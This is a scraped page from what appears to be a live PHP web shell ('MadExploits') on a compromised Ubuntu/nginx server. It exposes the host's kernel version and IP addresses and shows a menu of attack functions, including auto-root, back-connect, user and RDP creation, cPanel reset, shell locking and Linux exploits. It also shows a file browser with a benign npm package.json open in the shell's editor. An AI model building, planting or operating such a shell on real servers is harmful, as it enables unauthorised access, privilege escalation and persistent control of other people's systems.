Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
dom-converter /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
dr-xr-xr-x
LICENSE
1.05
KB
-rw-rw-rw-
README.md
165
B
-rw-rw-rw-
package.json
1.09
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "dom-converter", "version": "0.2.0", "description": "converts bare objects to DOM objects or xml representations", "main": "lib/domConverter.js", "dependencies": { "utila": "~0.4" }, "devDependencies": { "chai": "^1.10.0", "chai-changes": "^1.3.4", "chai-fuzzy": "^1.4.0", "coffee-script": "^1.8.0", "jitter": "^1.3.0", "mocha": "^2.0.1", "mocha-pretty-spec-reporter": "0.1.0-beta.1", "sinon": "^1.12.2", "sinon-chai": "^2.6.0" }, "scripts": { "test": "mocha \"test/**/*.coffee\"", "test:watch": "mocha \"test/**/*.coffee\" --watch", "compile": "coffee --bare --compile --output ./lib ./src", "compile:watch": "jitter src lib -b", "watch": "npm run compile:watch & npm run test:watch", "winwatch": "start/b npm run compile:watch & npm run test:watch", "prepublish": "npm run compile" }, "author": "Aria Minaei", "license": "MIT", "repository": { "type": "git", "url": "https://github.com/AriaMinaei/dom-converter" }, "bugs": { "url": "https://github.com/AriaMinaei/dom-converter/issues" } }
Close